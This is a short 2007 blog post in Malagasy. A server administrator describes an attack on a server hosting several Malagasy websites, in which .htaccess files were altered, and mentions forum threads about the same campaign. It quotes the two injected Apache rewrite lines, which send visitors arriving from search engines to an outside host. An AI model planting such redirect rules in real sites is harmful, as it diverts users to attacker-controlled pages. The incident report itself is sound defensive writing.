Server under attack

2007-08-28 @ 13:53 in Informatika

Tsy nahavita asa mihitsy indray aho androany maraina hatramin'izao fa voatafika indray ny serveur iray an'ny serasera izay misy ny blaogy.org, baiboly, artiste-malgache.com sy sites hafa vitsivitsy.

Tsy vao izao izy ity fa efa tamin'ny 24 na 25 jolay tany ary noezahina nahitsy fotsiny. Fa androany dia niverina indray ary dia niato mihitsy ny serveur.

Ny fomba fiadiny dia toa izao: ovainy ny fichier .htaccess isaky ny répertoires misy an'izany ka asiany redirection manokatra sites hafa. Ito no apetrany ao anatin'ilay .htaccess

RewriteCond %{HTTP_REFERER} ^.*(google|live|yahoo|ask|msn|aol|altavista).*$ [NC]
RewriteRule .*$ http://rostoffhost.info/strf/ [L]

Koa satria efa novaiko ny configuration'ny apache ao amin'ny serveur dia tsy nisokatra ilay site tiandry zalahy handefasana ny mpitsidika fa dia ny page d'erreur no nitranga.

Tsy izaho irery no voan'io fa efa resaka mandeha be etsy sy eroa. Azo jerena eto ambany.

http://www.developpez.net/forums/showthread.php?p=2434230 

http://forum.ubuntu-fr.org/viewtopic.php?pid=1128904 

Dia mbola eo am-pitadiavana vahaolana maharitra.

Verindrohy (trackback)

Momba ahy
hery

Ho hitanao ato ny isandroko. Angoniko ato mba hovakiako indray any aoriana any :-)

calendar
« Jolay 2024 »
At Ta Ar Ak Zo As Ah
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31        
Rohy
  • Blogroll
Tahiry